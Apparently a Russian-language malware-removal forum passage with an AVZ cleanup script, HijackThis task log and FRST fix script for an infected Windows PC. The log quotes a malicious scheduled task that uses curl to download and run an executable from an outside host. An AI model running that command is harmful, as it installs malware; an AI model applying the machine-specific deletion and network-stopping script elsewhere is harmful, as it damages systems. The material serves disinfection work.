Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
SetServiceStart('Ea3Host', 4);
QuarantineFile('C:\Windows\kms\bin\kmsss.exe','');
QuarantineFile('C:\Users\Chicken\AppData\Roaming\Microsoft\msi.exe','');
QuarantineFile('Downloads\aim037______ebuchadnezza.exe','');
QuarantineFile('C:\Users\Chicken\AppData\Roaming\curl\curl_7_54.exe','');
QuarantineFile('C:\Users\Chicken\AppData\Roaming\curl\curl.exe','');
QuarantineFile('C:\Windows\system32\Ea3Host.exe','');
QuarantineFile('c:\progra~2\raptri~1\playstv\qtwebengineprocess.exe','');
QuarantineFile('C:\Users\Chicken\AppData\Roaming\curl\curl_7_54.exe','');
DeleteFile('C:\Users\Chicken\AppData\Roaming\curl\curl_7_54.exe','32');
DeleteFile('C:\Windows\system32\Ea3Host.exe','32');
DeleteFile('C:\Users\Chicken\AppData\Roaming\curl\curl.exe','32');
DeleteFile('C:\Users\Chicken\AppData\Roaming\curl\curl_7_54.exe','32');
DeleteFile('C:\Windows\system32\Tasks\curl','64');
DeleteFile('C:\Windows\system32\Tasks\curls','64');
DeleteFile('Downloads\aim037______ebuchadnezza.exe','32');
DeleteFile('C:\Users\Chicken\AppData\Roaming\Microsoft\msi.exe','32');
DeleteFile('C:\Windows\system32\Tasks\MSI','64');
DeleteFile('C:\Windows\system32\Tasks\onepagesnewsnetnlqm','64');
ExecuteFile('schtasks.exe', '/delete /TN "curl" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "MSI" /F', 0, 15000, true);
ExecuteFile('schtasks.exe', '/delete /TN "curls" /F', 0, 15000, true);
DeleteService('Ea3Host');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
RebootWindows(true);
end.
begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.
O22 - Task (Ready): curl - C:\Users\Chicken\AppData\Roaming\curl\curl_7_54.exe -f -L "http://amtomil.ru/f.exe" -o "C:\Users\Chicken\AppData\Roaming\curl\curl.exe" (file missing)
O22 - Task (Ready): curls - C:\Users\Chicken\AppData\Roaming\curl\curl.exe (file missing)
O22 - Task (Ready): onepagesnewsnetnlqm - C:\Program Files (x86)\Google\Chrome\Application\chrome.exe onepagesnews.net/nlqm
O22 - Task (Ready): MSI - C:\Users\Chicken\AppData\Roaming\Microsoft\msi.exe cnt=1 fts="Downloads\aim037______ebuchadnezza.exe" (file missing)
Start::
CreateRestorePoint:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1082804275-3284897082-2107601924-1000\...\MountPoints2: {257b5481-47ce-11e7-a19e-90a4de9c0102} - E:\AutoRun.exe
HKU\S-1-5-21-1082804275-3284897082-2107601924-1000\...\MountPoints2: {970fabdd-5507-11e7-b83c-90a4de9c0102} - E:\AutoRun.exe
HKU\S-1-5-21-1082804275-3284897082-2107601924-1000\...\MountPoints2: {f73a9460-3246-11e7-839f-90a4de9c0102} - E:\AutoRun.exe
HKU\S-1-5-21-1082804275-3284897082-2107601924-1000\...\MountPoints2: {f73a9474-3246-11e7-839f-90a4de9c0102} - E:\AutoRun.exe
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
CHR Extension: (Chrome Media Router) - C:\Users\Chicken\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-07-14]
Task: {9BDA2F70-9964-4B5D-AE7A-66AF57A67C0A} - \onepagesnewsnetnlqm -> No File <==== ATTENTION
EmptyTemp:
Reboot:
End::